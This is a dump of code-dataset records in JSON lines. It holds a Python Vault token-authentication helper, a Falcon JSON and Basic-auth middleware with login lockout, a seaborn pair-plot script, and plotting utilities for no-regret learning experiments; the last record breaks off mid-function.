os.access(keyfile, os.R_OK):\n raise VaultCredentialProviderError(\"File not found or not readable: %s\" % keyfile)\n creds = (certfile, keyfile)\n i = cls(url, creds, AUTH_TYPE_SSL, AUTH_TYPE_SSL)\n i.credentials = (certfile, keyfile)\n return i\n\n\n @classmethod\n def token(cls, url, token):\n return cls(url, token, AUTH_TYPE_TOKEN, AUTH_TYPE_TOKEN)\n\n\n def __init__(self, url, credentials, auth_type, auth_mount):\n self.url = url\n self.credentials = credentials\n self.auth_type = auth_type\n self.auth_mount = auth_mount\n self.ssl_verify = VAULT_CACERT if VAULT_CACERT else VAULT_SSL_VERIFY\n self._client = None\n self._client_pid = None\n self._client_expires = None\n # Start background thread to keep the Vault token fresh\n self.start_background_lease_renewer(interval=TOKEN_RENEW_INTERVAL)\n\n\n @property\n def token_filename(self):\n return os.path.abspath(os.path.expanduser(VAULT_TOKEN_CACHE))\n\n\n @property\n def lock_filename(self):\n return '{}.lock'.format(self.token_filename)\n\n\n def authenticated_client(self):\n # Is there a valid client still in memory? Try to use it.\n if self._client and self._client_pid and self._client_expires:\n refresh_threshold = (self._client_expires - timedelta(seconds=TOKEN_REFRESH_SECONDS))\n if self._client_pid == os.getpid() and datetime.now(tz=pytz.UTC) <= refresh_threshold and self._client.is_authenticated():\n return self._client\n\n # Obtain a lock file so prevent races between multiple processes trying to obtain tokens at the same time\n with portalocker.Lock(self.lock_filename, timeout=10):\n\n # Try to use a cached token if at all possible\n cache = self.read_token_cache()\n if cache:\n client = hvac.Client(url=self.url, verify=self.ssl_verify, token=cache['token'])\n if client.is_authenticated():\n self._client = client\n self._client_pid = os.getpid()\n self._client_expires = cache['expire_time']\n return self._client\n\n # Couldn't use cache, so obtain a new token instead\n client = self.build_client()\n self.write_token_cache(client)\n\n # Return the client\n return client\n\n\n def build_client(self):\n if self.auth_type == AUTH_TYPE_TOKEN:\n client = hvac.Client(url=self.url, verify=self.ssl_verify, token=self.credentials)\n\n elif self.auth_type == AUTH_TYPE_APPID:\n client = hvac.Client(url=self.url, verify=self.ssl_verify)\n client.auth_app_id(*self.credentials)\n\n elif self.auth_type == AUTH_TYPE_AWS_IAM:\n import boto3\n session = boto3.Session()\n credentials = session.get_credentials()\n client = hvac.Client(url=self.url, verify=self.ssl_verify)\n client.auth_aws_iam(\n access_key=credentials.access_key,\n secret_key=credentials.secret_key,\n session_token=credentials.token,\n header_value=self.credentials[0],\n mount_point=self.auth_mount,\n role=self.credentials[1],\n use_token=True,\n region=VAULT_IAM_REGION)\n\n elif self.auth_type == AUTH_TYPE_KUBERNETES:\n client = hvac.Client(url=self.url, verify=self.ssl_verify)\n client.auth_kubernetes(\n role=self.credentials[0],\n jwt=self.credentials[1],\n use_token=True,\n mount_point=self.auth_mount)\n\n elif self.auth_type == AUTH_TYPE_APPROLE:\n client = hvac.Client(url=self.url, verify=self.ssl_verify)\n client.auth_approle(*self.credentials, mount_point=self.auth_mount, use_token=True)\n\n elif self.auth_type == AUTH_TYPE_SSL:\n client = hvac.Client(url=self.url, verify=self.ssl_verify, cert=self.credentials)\n client.auth_tls()\n\n else:\n raise VaultCredentialProviderError(\"Missing or invalid Vault authentication configuration\")\n\n if not client.is_authenticated():\n raise VaultCredentialProviderError(\"Unable to authenticate Vault client using provided credentials \" \"(type=%s)\" % self.auth_type)\n\n return client\n\n\n def renew_lease(self):\n logger.info('Attempting to renew Vault token lease.')\n with portalocker.Lock(self.lock_filename, timeout=10):\n # Read the current lease data from disk\n data = self.read_token_cache(lease_grace_period=0)\n if not data:\n logger.info('Failed to renew lease because the Vault token cache was empty.')\n return\n # Check if we still need to renew the lease\n now = datetime.now(tz=pytz.UTC)\n old_expiry = data['expire_time']\n refresh_threshold = (old_expiry - timedelta(seconds=(TOKEN_REFRESH_SECONDS + TOKEN_RENEW_INTERVAL)))\n if now < refresh_threshold:\n logger.info('Not renewing Vault token lease because the current expiry time is acceptable. now=[%s], expires=[%s]', now, old_expiry)\n return\n # Renew the lease\n client = self.authenticated_client()\n try:\n result = client.renew_token(increment=VAULT_TOKEN_LEASE_RENEW_SECONDS)\n except Exception as e:\n logger.warning('Failed to renew Vault token lease. error=[%s]', e)\n return\n # Write the result back to disk\n self.write_token_cache(client)\n lease_duration = result.get('auth', {}).get('lease_duration', 0)\n new_expiry = datetime.now(tz=pytz.UTC) + timedelta(seconds=lease_duration)\n logger.info(\"Renewed lease for Vault token. accessor=[%s], old_expires=[%s], new_expires=[%s]\",\n result.get('auth', {}).get('accessor', ''),\n old_expiry.isoformat(),\n new_expiry.isoformat())\n return\n\n\n def start_background_lease_renewer(self, interval):\n if getattr(self, 'daemon_thread', None) and self.daemon_thread.isAlive():\n return\n self.daemon_thread = Thread(\n target=self.start_lease_renewer,\n args=(interval, ),\n daemon=True)\n self.daemon_thread.start()\n\n\n def start_lease_renewer(self, interval):\n loop = asyncio.new_event_loop()\n\n def _schedule():\n jitter = (interval / 5)\n min_interval = interval - jitter\n max_interval = interval + jitter\n in_seconds = random.randrange(min_interval, max_interval)\n logger.info('Will attempt to renew Vault token lease in %s seconds', in_seconds)\n loop.call_later(in_seconds, _renew)\n\n def _renew():\n try:\n self.renew_lease()\n except Exception as e:\n logger.exception('Failed to renew Vault token lease. error=[%s]', e)\n _schedule()\n\n _schedule()\n loop.run_forever()\n\n\n def read_token_cache(self, lease_grace_period=TOKEN_REFRESH_SECONDS):\n # Try to read the cached token from the file system\n try:\n with open(self.token_filename, 'r') as token_file:\n data = json.load(token_file)\n except OSError:\n return None\n\n # Parse the token expiration time\n try:\n data['expire_time'] = dateutil.parser.parse(data.get('expire_time'))\n except ValueError:\n return None\n\n # Check if the token is expired. If it is, return None\n refresh_threshold = (data['expire_time'] - timedelta(seconds=lease_grace_period))\n if datetime.now(tz=pytz.UTC) > refresh_threshold:\n return None\n\n return data\n\n\n def write_token_cache(self, client):\n token_info = client.lookup_token()\n self._client = client\n self._client_pid = os.getpid() # Store the current PID so we know to create a new client if this process gets forked.\n if token_info['data']['expire_time']:\n self._client_expires = dateutil.parser.parse(token_info['data']['expire_time'])\n else:\n self._client_expires = datetime.now(tz=pytz.UTC) + timedelta(days=30)\n token_data = {\n 'expire_time': self._client_expires,\n 'token': self._client.token,\n }\n with open(self.token_filename, 'w') as token_file:\n json.dump(token_data, token_file, cls=DjangoJSONEncoder)\n # Make the file only readable to the owner\n os.chmod(self.token_filename, stat.S_IRUSR | stat.S_IWUSR)\n\n\n def purge_token_cache(self):\n with portalocker.Lock(self.lock_filename, timeout=10):\n try:\n os.unlink(self.token_filename)\n except FileNotFoundError:\n pass\n\n\n\ndef init_vault():\n if VaultAuthenticator.has_envconfig():\n threadLocal.vaultAuthenticator = VaultAuthenticator.fromenv()\n else:\n threadLocal.vaultAuthenticator = None\n logger.warning('Could not load Vault configuration from environment variables')\n\n\ndef reset_vault():\n threadLocal.vaultAuthenticator = None\n\n\ndef get_vault_auth():\n if not getattr(threadLocal, 'vaultAuthenticator', None):\n init_vault()\n return threadLocal.vaultAuthenticator\n","sub_path":"src/vaulthelpers/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":14913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"409849943","text":"import falcon, json, base64, datetime\nfrom passlib.hash import pbkdf2_sha512\n\nimport pycomponents\n\nconfig = pycomponents.initConfig()\nmongodb_collection_authenticator = config.get('component-authenticator', 'collection', fallback='component-authenticator')\n\nclass RequireJSON(object):\n def process_request(self, req, resp):\n if not req.client_accepts_json:\n raise falcon.HTTPNotAcceptable('This API only supports responses encoded as JSON.')\n\n if req.method in ('POST', 'PUT'):\n if req.content_type is None or 'application/json' not in req.content_type:\n raise falcon.HTTPUnsupportedMediaType('This API only supports requests encoded as JSON.')\n\n\nclass JSONTranslator(object):\n def process_request(self, req, resp):\n if req.content_length in (None, 0):\n return\n\n body = req.stream.read()\n if not body:\n raise falcon.HTTPBadRequest('Empty request body', 'A valid JSON document is required.')\n\n try:\n req.context['json'] = json.loads(body.decode('utf-8'))\n\n except (ValueError, UnicodeDecodeError):\n raise falcon.HTTPError(falcon.HTTP_753,'Malformed JSON', 'Could not decode the reqeust body. The JSON was incorrect or not encoded as UTF-8.')\n\n def process_response(self, req, resp, resource):\n if 'json' not in resp.context:\n return\n\n resp.body = json.dumps(resp.context['json'])\n\nclass Auth(object):\n def process_request(self, req, resp):\n mongo_conn = pycomponents.initMongoDBConn(component=mongodb_collection_authenticator)\n\n req.context['msg'] = []\n req.context['status'] = (falcon.HTTP_200, 200, )\n\n auth_exp = req.auth.split(' ') if req.auth is not None else (None, None,)\n\n if auth_exp[0] is not None and auth_exp[0].lower() == 'basic':\n auth = base64.b64decode(auth_exp[1]).decode('utf-8').split(':')\n username = auth[0].lower()\n password = auth[1]\n else:\n raise falcon.HTTPUnauthorized('Unauthorized', 'Your access is not allowed.')\n\n\n security_login = mongo_conn['options'].find_one({\n 'key':'security-login'\n })\n\n req.context['account'] = mongo_conn['account'].find_one({\n 'email': username\n })\n\n if security_login is not None and security_login['value'] is True and req.context['account'] is not None:\n if 'security' in req.context['account']:\n expire_min = security_login['settings']['ban-time-min']\n expire_time = req.context['account']['security']['last-try'] + datetime.timedelta(minutes=expire_min)\n\n if security_login['settings']['count'] <= req.context['account']['security']['wrong-login'] and expire_time >= datetime.datetime.utcnow():\n raise falcon.HTTPForbidden('Forbidden', f'To many trys for login, you can try agin after {expire_time} UTC')\n\n elif expire_time < datetime.datetime.utcnow():\n mongo_conn['account'].update_one({\n '_id': req.context['account']['_id']\n }, {\n '$set': {\n 'security.wrong-login': 0,\n 'security.last-try': datetime.datetime.utcnow(),\n }\n })\n\n else:\n mongo_conn['account'].update_one({\n '_id': req.context['account']['_id']\n }, {\n '$set': {\n 'last-succees-login': datetime.datetime.utcnow(),\n 'security.wrong-login': 0,\n 'security.last-try': datetime.datetime.utcnow(),\n }\n })\n\n\n\n if req.context['account'] is None:\n req.context['status'] = (falcon.HTTP_UNAUTHORIZED, 401,)\n elif req.context['account'] is not None and pbkdf2_sha512.verify(password, req.context['account']['password']) is False:\n req.context['status'] = (falcon.HTTP_UNAUTHORIZED, 401,)\n\n if req.context['status'][1] != 200:\n req.context['msg'].append('You email or password is wrong!')\n\n if security_login is not None and security_login['value'] is True and req.context['account'] is not None:\n mongo_conn['account'].update_one({\n '_id': req.context['account']['_id']\n }, {\n '$set': {\n 'security.last-try': datetime.datetime.utcnow(),\n },\n '$inc': {\n 'security.wrong-login': 1\n }\n })","sub_path":"pycomponents/falcon/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"437092806","text":"# **************************************************************************** #\n# #\n# ::: :::::::: #\n# pair_plot.py :+: :+: :+: #\n# +:+ +:+ +:+ #\n# By: gmonnier +#+ +:+ +#+ #\n# +#+#+#+#+#+ +#+ #\n# Created: 2018/10/08 13:21:17 by gmonnier #+# #+# #\n# Updated: 2018/11/17 15:56:18 by gmonnier ### ########.fr #\n# #\n# **************************************************************************** #\n\nimport seaborn as sns\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport sys\n\nimport utils\n\ndef cut_col(df):\n df.columns = [utils.cut_str(col) for col in df.columns.values]\n return df\n\ndef main():\n if len(sys.argv) != 2:\n print('Usage: %s [dataset_train.csv]' % (sys.argv[0]))\n sys.exit(1)\n\n try:\n df = utils.get_data(sys.argv[1])\n df = df.fillna(0)\n df = cut_col(df)\n sns.pairplot(df, hue=utils.cut_str(utils.HOUSES_COL),\n dropna=True, plot_kws={\"s\": 6}, height=1.75)\n plt.tight_layout()\n plt.subplots_adjust(\n left=0.04,\n bottom=0.07,\n right=0.92,\n top=0.99,\n wspace=0.52,\n hspace=0.71)\n plt.show()\n except Exception as e:\n print(e)\n print(\"Error trying to plot the pair plot\")\n sys.exit(1)\n ## Herbology, Astronomy, Defense against dark\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/pair_plot.py","file_name":"pair_plot.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"561109217","text":"'''\nCollection of utility functions to analyze Continuous No-Regret algorithms\n\n@author: Maximilian Balandat\n@date May 25, 2015\n'''\n\nimport numpy as np\nimport pickle, os\nfrom matplotlib import pyplot as plt\nfrom matplotlib import cm\nimport mpl_toolkits.mplot3d.axes3d as p3\nfrom .Domains import nBox, DifferenceOfnBoxes\n\n\ndef plot_results(results, offset=500, directory=None, show=True):\n \"\"\" Plots and shows or saves (or both) the simulation results \"\"\"\n # set up figures\n ylimits = [[np.Infinity, -np.Infinity] for i in range(3)]\n plt.figure(1)\n plt.title('cumulative regret, {} losses'.format(results[0].problem.lossfuncs[0].desc))\n plt.xlabel('t')\n plt.figure(2)\n plt.title('time-avg. cumulative regret, {} losses'.format(results[0].problem.lossfuncs[0].desc))\n plt.xlabel('t')\n plt.figure(3)\n plt.title(r'log time-avg. cumulative regret, {} losses'.format(results[0].problem.lossfuncs[0].desc))\n plt.xlabel('t') \n # and now plot, depending on what data is there\n for result in results:\n if result.algo in ['DA', 'OGD']:\n try:\n plt.figure(1)\n lavg = plt.plot(result.regs_norate['savg'][0], linewidth=2.0, label=result.label, rasterized=True)\n plt.fill_between(np.arange(result.problem.T), result.regs_norate['perc_10'][0], \n result.regs_norate['perc_90'][0], color=lavg[0].get_color(), alpha=0.1, rasterized=True)\n plt.figure(2)\n ltavg = plt.plot(np.arange(result.problem.T)[offset:], result.regs_norate['tsavg'][0][offset:], \n linewidth=2.0, label=result.label, rasterized=True)\n plt.fill_between(np.arange(offset,result.problem.T), result.regs_norate['tavg_perc_10'][0][offset:], \n result.regs_norate['tavg_perc_90'][0][offset:], color=ltavg[0].get_color(), alpha=0.1, rasterized=True)\n plt.xlim((0, result.problem.T)) \n plt.figure(3)\n lltsavg = plt.plot(np.arange(1,result.problem.T+1), result.regs_norate['tsavg'][0], linewidth=2.0, \n label=result.label, rasterized=True)\n plt.fill_between(np.arange(1,result.problem.T+1), result.regs_norate['tavg_perc_10'][0], \n result.regs_norate['tavg_perc_90'][0], color=lltsavg[0].get_color(), alpha=0.1, rasterized=True)\n plt.plot(np.arange(1,result.problem.T+1), result.regs_norate['tsavgbnd'][0], '--', \n color=lltsavg[0].get_color(), linewidth=2, rasterized=True)\n ylimits[2][0] = np.minimum(ylimits[2][0], np.min(result.regs_norate['tsavg'][0]))\n ylimits[2][1] = np.maximum(ylimits[2][1], 1.1*np.max(result.regs_norate['tsavgbnd'][0])) \n except AttributeError: pass\n try:\n for i,(T,eta) in enumerate(result.etaopts.items()):\n plt.figure(1)\n lavg = plt.plot(result.regs_etaopts['savg'][i][0:T], linewidth=2.0, \n label=result.label+' '+r' $\\eta_{{opt}}(T={0:.1e}) = {1:.3f}$'.format(T, eta), rasterized=True)\n plt.plot(np.arange(T,result.problem.T), result.regs_etaopts['savg'][i][T:], '--', \n color=lavg[0].get_color(), linewidth=2, rasterized=True)\n plt.fill_between(np.arange(result.problem.T), result.regs_etaopts['perc_10'][i], \n result.regs_etaopts['perc_90'][i], color=lavg[0].get_color(), alpha=0.1, rasterized=True)\n plt.figure(2)\n ltavg = plt.plot(np.arange(offset,T), result.regs_etaopts['tsavg'][i][offset:T], linewidth=2.0, \n label=result.label+' '+r' $\\eta_{{opt}}(T={0:.1e}) = {1:.3f}$'.format(T, eta), rasterized=True)\n plt.plot(np.arange(T,result.problem.T), result.regs_etaopts['tsavg'][i][T:], '--', \n color=ltavg[0].get_color(), linewidth=2, rasterized=True)\n plt.fill_between(np.arange(offset,result.problem.T), result.regs_etaopts['tavg_perc_10'][i][offset:], \n result.regs_etaopts['tavg_perc_90'][i][offset:], color=ltavg[0].get_color(), alpha=0.1, rasterized=True)\n plt.xlim((0, result.problem.T))\n plt.figure(3)\n llogtavg = plt.plot(np.arange(1,result.problem.T+1), result.regs_etaopts['tsavg'][i], \n linewidth=2.0, label=result.label+' '+r' $\\eta_{{opt}}(T={0:.1e}) = {1:.3f}$'.format(T, eta), rasterized=True)\n plt.fill_between(np.arange(1,result.problem.T+1), result.regs_etaopts['tavg_perc_10'][i], \n result.regs_etaopts['tavg_perc_90'][i], color=llogtavg[0].get_color(), alpha=0.1, rasterized=True)\n plt.plot(np.arange(1,result.problem.T+1), result.regs_etaopts['tsavgbnd'][i], '--', \n color=llogtavg[0].get_color(), linewidth=2, rasterized=True)\n ylimits[2][0] = np.minimum(ylimits[2][0], np.min(result.regs_etaopts['tsavg'][0]))\n ylimits[2][1] = np.maximum(ylimits[2][1], 1.1*np.max(result.regs_etaopts['tsavgbnd'][0])) \n # \n except AttributeError: pass\n try:\n for i,eta in enumerate(result.etas):\n plt.figure(1)\n lavg = plt.plot(result.regs_etas['savg'][i], linewidth=2.0, label=result.label+' '+r' $\\eta = {0:.3f}$'.format(eta), rasterized=True)\n plt.fill_between(np.arange(result.problem.T), result.regs_etas['perc_10'][i], \n result.regs_etas['perc_90'][i], color=lavg[0].get_color(), alpha=0.1, rasterized=True)\n plt.figure(2)\n ltavg = plt.plot(np.arange(offset,result.problem.T), result.regs_etas['tsavg'][i][offset:], \n linewidth=2.0, label=result.label+' '+r'$\\eta = {0:.3f}$'.format(eta), rasterized=True)\n plt.fill_between(np.arange(offset,result.problem.T), result.regs_etas['tavg_perc_10'][i][offset:], \n result.regs_etas['tavg_perc_90'][i][offset:], color=ltavg[0].get_color(), alpha=0.1, rasterized=True)\n plt.xlim((0, result.problem.T))\n plt.figure(3)\n llogtavg = plt.plot(np.arange(1,result.problem.T+1), result.regs_etas['tsavg'][i], linewidth=2.0, \n label=result.label+' '+r' $\\eta = {0:.3f}$'.format(eta), rasterized=True)\n plt.fill_between(np.arange(1,result.problem.T+1), result.regs_etas['tavg_perc_10'][i], \n result.regs_etas['tavg_perc_90'][i], color=llogtavg[0].get_color(), alpha=0.1, rasterized=True) \n plt.plot(np.arange(1,result.problem.T+1), result.regs_etas['tsavgbnd'][i], '--', \n color=llogtavg[0].get_color(), linewidth=2, rasterized=True) \n ylimits[2][0] = np.minimum(ylimits[2][0], np.min(result.regs_etaos['tsavg'][0]))\n ylimits[2][1] = np.maximum(ylimits[2][1], 1.1*np.max(result.regs_etas['tsavgbnd'][0])) \n except AttributeError: pass\n try:\n for i,alpha in enumerate(result.alphas):\n plt.figure(1)\n lavg = plt.plot(result.regs_alphas['savg'][i], linewidth=2.0,\n label=result.label+' '+r' $\\eta_t = {0} \\cdot t^{{{1}}}$'.format(result.thetas[i], -alpha), rasterized=True)\n plt.fill_between(np.arange(result.problem.T), result.regs_alphas['perc_10'][i], \n result.regs_alphas['perc_90'][i], color=lavg[0].get_color(), alpha=0.1, rasterized=True)\n plt.figure(2)\n ltavg = plt.plot(np.arange(result.problem.T)[offset:], result.regs_alphas['tsavg'][i][offset:], linewidth=2.0, \n label=result.label+' '+r' $\\eta_t = {0} \\cdot t^{{{1}}}$'.format(result.thetas[i], -alpha), rasterized=True)\n plt.fill_between(np.arange(offset,result.problem.T), result.regs_alphas['tavg_perc_10'][i][offset:], \n result.regs_alphas['tavg_perc_90'][i][offset:], color=ltavg[0].get_color(), alpha=0.1, rasterized=True)\n plt.xlim((0, result.problem.T)) \n plt.figure(3)\n lltsavg = plt.plot(np.arange(1,result.problem.T+1), result.regs_alphas['tsavg'][i], linewidth=2.0, \n label=result.label+' '+r' $\\eta_t = {0} \\cdot t^{{{1}}}$'.format(result.thetas[i], -alpha), rasterized=True)\n plt.fill_between(np.arange(1,result.problem.T+1), result.regs_alphas['tavg_perc_10'][i], \n result.regs_alphas['tavg_perc_90'][i], color=lltsavg[0].get_color(), alpha=0.1, rasterized=True)\n plt.plot(np.arange(1,result.problem.T+1), result.regs_alphas['tsavgbnd'][i], '--', color=lltsavg[0].get_color(), \n linewidth=2.0, rasterized=True)\n ylimits[2][0] = np.minimum(ylimits[2][0], np.min(result.regs_alphas['tsavg'][0]))\n ylimits[2][1] = np.maximum(ylimits[2][1], 1.1*np.max(result.regs_alphas['tsavgbnd'][0])) \n except AttributeError: pass\n else:\n plt.figure(1)\n lavg = plt.plot(result.regs_norate['savg'][0], linewidth=2.0, label=result.label, rasterized=True)\n plt.fill_between(np.arange(result.problem.T), result.regs_norate['perc_10'][0], \n result.regs_norate['perc_90'][0], color=lavg[0].get_color(), alpha=0.1, rasterized=True)\n plt.figure(2)\n ltavg = plt.plot(np.arange(result.problem.T)[offset:], result.regs_norate['tsavg'][0][offset:], \n linewidth=2.0, label=result.label, rasterized=True)\n plt.fill_between(np.arange(offset,result.problem.T), result.regs_norate['tavg_perc_10'][0][offset:], \n result.regs_norate['tavg_perc_90'][0][offset:], color=ltavg[0].get_color(), alpha=0.1, rasterized=True)\n plt.xlim((0, result.problem.T)) \n plt.figure(3)\n lltsavg = plt.plot(np.arange(1,result.problem.T+1), result.regs_norate['tsavg'][0], linewidth=2.0, \n label=result.label, rasterized=True)\n plt.fill_between(np.arange(1,result.problem.T+1), result.regs_norate['tavg_perc_10'][0], \n result.regs_norate['tavg_perc_90'][0], color=lltsavg[0].get_color(), alpha=0.1, rasterized=True)\n plt.plot(np.arange(1,result.problem.T+1), result.regs_norate['tsavgbnd'][0], '--', \n color=lltsavg[0].get_color(), linewidth=2, rasterized=True)\n ylimits[2][0] = np.minimum(ylimits[2][0], np.min(result.regs_norate['tsavg'][0]))\n ylimits[2][1] = np.maximum(ylimits[2][1], 1.1*np.max(result.regs_norate['tsavgbnd'][0])) \n \n # make plots pretty and show legend\n plt.figure(1)\n plt.legend(loc='upper left', prop={'size':13}, frameon=False) \n plt.figure(2)\n plt.legend(loc='upper right', prop={'size':13}, frameon=False) \n plt.figure(3)\n plt.yscale('log'), plt.xscale('log')\n# plt.ylim(np.log(ylimits[2][0]), np.log(ylimits[2][1]))\n plt.legend(loc='upper right', prop={'size':13}, frameon=False) \n if directory:\n os.makedirs(directory+'figures/', exist_ok=True) # this could probably use a safer implementation \n filename = '{}{}_{}_'.format(directory+'figures/', results[0].problem.desc, results[0].problem.lossfuncs[0].desc)\n plt.figure(1)\n plt.savefig(filename + 'cumloss.pdf', bbox_inches='tight', dpi=300)\n plt.figure(2)\n plt.savefig(filename + 'tavgloss.pdf', bbox_inches='tight', dpi=300)\n plt.figure(3)\n plt.savefig(filename + 'loglogtavgloss.pdf', bbox_inches='tight', dpi=300)\n if show:\n plt.show()\n\n\ndef plot_dims(results, directory=None, show=True):\n \"\"\" Plots and shows or saves (or both) the simulation results \"\"\"\n # set up figures\n# ylimits = [np.Infinity, -np.Infinity]\n f = plt.figure()\n plt.title(r'log time-avg. cumulative regret, {} losses'.format(results[0].problem.lossfuncs[0].desc))\n plt.xlabel('t') \n dim_styles = {2:'--', 3:'-.', 4:':'}\n # and now plot, depending on what data is there\n for loss_results in results:\n for result in loss_results:\n lltsavg = plt.plot(np.arange(1,result.problem.T+1), result.regs_norate['tsavg'], linewidth=2.0, \n linestyle=dim_styles[result.dim], label=result.label, rasterized=True)\n plt.fill_between(np.arange(1,result.problem.T+1), result.regs_norate['tavg_perc_10'], result.regs_norate['tavg_perc_90'], \n linestyle=dim_styles[result.dim], color=lltsavg[0].get_color(), alpha=0.1, rasterized=True) \n # make plots pretty and show legend\n plt.yscale('log'), plt.xscale('log')\n plt.legend(loc='upper right', prop={'size':13}, frameon=False) \n if directory:\n os.makedirs(directory+'figures/', exist_ok=True) # this could probably use a safer implementation \n filename = '{}{}_{}_'.format(directory+'figures/', results[0].problem.desc, results[0].problem.lossfuncs[0].desc)\n plt.savefig(filename + 'loglogtavgloss.pdf', bbox_inches='tight', dpi=300)\n if show:\n plt.show()\n plt.close()\n\n\n\ndef plot_loglogs(results, directory=None, show=True, bounds=True, **kwargs):\n \"\"\" Plots and shows or saves (or both) the simulation results \"\"\"\n # set up figures\n f = plt.figure()\n loss_title = list(results[0].values())[0].problem.lossfuncs[0].desc\n plt.title(r'log time-avg. cumulative regret, {} losses'.format(loss_title))\n plt.xlabel('t')\n colors = ['k', 'r', 'g', 'b', 'c', 'm', 'y']*3\n loss_styles = ['-', '--', '-.', ':']*3\n labs = kwargs.get('labels')\n # and now plot, depending on what data is there\n for i,loss_results in enumerate(results):\n for j,key in enumerate(loss_results.keys()):\n r = loss_results[key]\n if labs is not None:\n lab = labs[i][j]\n print(lab)\n else:\n lab = r.label\n lltsavg = plt.plot(np.arange(1,r.problem.T+1), r.regs_norate['tsavg'][0], linewidth=2.0, \n linestyle=loss_styles[i], color=colors[j], label=lab, rasterized=True)\n plt.fill_between(np.arange(1,r.problem.T+1), r.regs_norate['tavg_perc_10'][0], r.regs_norate['tavg_perc_90'][0], \n linestyle=loss_styles[i], color=colors[j], alpha=0.1, rasterized=True)\n if bounds:\n try:\n plt.plot(np.arange(1,r.problem.T+1), r.regs_norate['tsavgbnd'][0], \n color=colors[j], linewidth=3, rasterized=True) \n except IndexError: pass \n # make plots pretty and show legend\n plt.yscale('log'), plt.xscale('log')\n plt.legend(prop={'size':12}, frameon=False, **kwargs) #loc='lower center', \n if directory:\n os.makedirs(directory, exist_ok=True) # this could probably use a safer implementation \n filename = '{}{}_{}_'.format(directory, list(results[0].values())[0].problem.desc, \n list(results[0].values())[0].problem.lossfuncs[0].desc)\n plt.savefig(filename + 'loglogtavgloss.pdf', bbox_inches='tight', dpi=300)\n if show:\n plt.show()\n plt.close()\n \n\ndef plot_snapshots(results, times, filename=None, show=False, **kwargs):\n \"\"\" Creates a sequence of plots from the pltdata array in the results at the\n time steps specified in times (will be ordered increasing). \n Here results is an iterable of results. The resulting figure will have \n len(results) x len(times) plots. \"\"\"\n pltpoints = results[0].problem.pltpoints\n fig = plt.figure(figsize=kwargs.get('figsize'))\n # idk why the FUCK this does not work just using np arrays!?\n zmax = np.max([np.max([np.max([np.max(df) for df in dflat]) for dflat in result.pltdata]) for result in results])\n zmin = np.min([np.min([np.min([np.min(df) for df in dflat]) for dflat in result.pltdata]) for result in results])\n for i,result in enumerate(results):\n bbox = result.problem.domain.bbox()\n for j,time in enumerate(np.sort(times)):\n ax = fig.add_subplot(len(results), len(times), len(times)*i+j+1, projection='3d')\n for points,dat in zip(pltpoints, result.pltdata[time]):\n ax.plot_trisurf(points[:,0], points[:,1], dat, cmap=plt.get_cmap('jet'), \n linewidth=0, vmin=zmin, vmax=zmax)\n # Setting the axes properties\n ax.set_xlim3d(bbox.bounds[0])\n ax.set_xlabel('$s_1$')\n ax.set_ylim3d(bbox.bounds[1])\n ax.set_ylabel('$s_2$')\n ax.set_zlim3d([-0.1, zmax])\n ax.set_zlabel('$x$')\n ax.set_title('t={}'.format(time))\n ax.w_xaxis.set_pane_color((1.0, 1.0, 1.0, 1.0))\n ax.w_yaxis.set_pane_color((1.0, 1.0, 1.0, 1.0))\n ax.w_zaxis.set_pane_color((1.0, 1.0, 1.0, 1.0))\n ax.view_init(elev=kwargs.get('elev'), azim=kwargs.get('azim'))\n plt.tight_layout()\n# if directory:\n# os.makedirs(directory, exist_ok=True) # this could probably use a safer implementation \n# filename = '{}{}_{}_'.format(directory, results[0].problem.desc, \n# results[0].problem.lossfuncs[0].desc)\n# plt.savefig(filename + 'snapshots.pdf', bbox_inches='tight', dpi=300)\n if filename is not None:\n plt.savefig(filename, bbox_inches='tight', dpi=300)\n if show:\n plt.show()\n plt.close()\n\n\ndef save_results(results, directory):\n \"\"\" Serializes a results object for persistent storage using the pickle module. \"\"\" \n os.makedirs(directory, exist_ok=True) # this could probably use a safer implementation\n slope_txt = []\n for result in results:\n try:\n [slope_txt.append('{}, Empirical: {}\\n'.format(result.label, val[0])) for val in result.slopes.values()]\n [slope_txt.append('{}, Bounds: {}\\n'.format(result.label, val[0])) for val in result.slopes_bnd.values()] \n del result.problem.pltpoints, result.problem.data\n except (AttributeError, IndexError):\n pass\n slopes_name = '{}{}_{}_slopes.txt'.format(directory, results[0].problem.desc, \n results[0].problem.lossfuncs[0].desc)\n with open(slopes_name, 'w') as f:\n f.writelines(slope_txt)\n pigglname = '{}{}_{}.piggl'.format(directory, results[0].problem.desc, \n results[0].problem.lossfuncs[0].desc) \n with open(pigglname, 'wb') as f:\n pickle.dump(results, f, pickle.HIGHEST_PROTOCOL) \n\n\ndef visualize_potentials(potentials, xlim=(-1,5), **kwargs):\n u = np.linspace(xlim[0], xlim[1], 1000)\n plt.figure(figsize=kwargs.get('figsize'))\n labels = kwargs.get('labels')\n if labels is None:\n labels = [pot.desc for pot in potentials]\n if kwargs.get('semilogy') == True:\n for vals,label in zip([pot.phi(u) for pot in potentials], labels):\n plt.semilogy(u, 1+vals, label=label)\n else:\n for vals,label in zip([pot.phi(u) for pot in potentials], labels):\n plt.plot(u, vals, label=label, linewidth=2)\n plt.ylim(kwargs.get('ylim'))\n plt.xlabel('$u$', fontsize=15)\n plt.ylabel('$\\phi(u)$', fontsize=15)\n plt.legend(loc=kwargs.get('loc'), frameon=False)\n plt.title('Various $\\omega$-potentials')\n plt.tight_layout()\n if kwargs.get('filename') is not None:\n plt.savefig(kwargs.get('filename'), bbox_inches='tight', dpi=300)\n if kwargs.get('show') is not False:\n plt.show()\n plt.close()\n \n \ndef circular_tour(domain, N):\n \"\"\" Returns a sequence of N points that wander around in a circle\n in the domain. Used for understanding various learning rates. \"\"\"\n if domain.n != 2:\n raise Exception('For now circular_tour only works in dimension 2')\n if isinstance(domain, nBox):\n center = np.array([0.5*(bnd[0]+bnd[1]) for bnd in domain.bounds])\n halfaxes = np.array([0.75*0.5*(bnd[1]-bnd[0]) for bnd in domain.bounds])\n return np.array([center[0] + halfaxes[0]*np.cos(np.linspace(0,2*np.pi,N)), \n 